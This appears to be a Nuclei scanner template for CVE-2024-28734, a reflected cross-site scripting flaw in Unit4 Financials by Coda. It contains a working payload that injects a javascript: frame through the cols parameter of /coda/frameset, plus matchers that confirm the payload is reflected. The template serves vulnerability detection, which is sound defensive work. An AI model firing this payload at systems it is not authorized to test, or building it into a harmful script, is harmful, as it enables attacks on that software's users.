42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: CVE-2024-28734
|
|
|
|
info:
|
|
name: Coda v.2024Q1 - Cross-Site Scripting
|
|
author: Kazgangap
|
|
severity: medium
|
|
description: |
|
|
Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28734
|
|
- http://financials.com
|
|
- http://unit4.com
|
|
classification:
|
|
epss-score: 0.00045
|
|
epss-percentile: 0.12994
|
|
metadata:
|
|
max-request: 1
|
|
tags: packetstorm,cve,cve2024,coda,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /coda/frameset?cols="><frame%20src="javascript:alert(document.domain)"> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<frameset cols=""><frame src="javascript:alert(document.domain)">'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502201aaadc24cf45d9dfb1bf02a74d4c050dee86630aec998cf9fecb300af3c80b81022100a732dbb88437b2e94b89d4ad56fe2bbe5ce339d77a292639376b049919c7e896:922c64590222798bb761d5b6d8e72950 |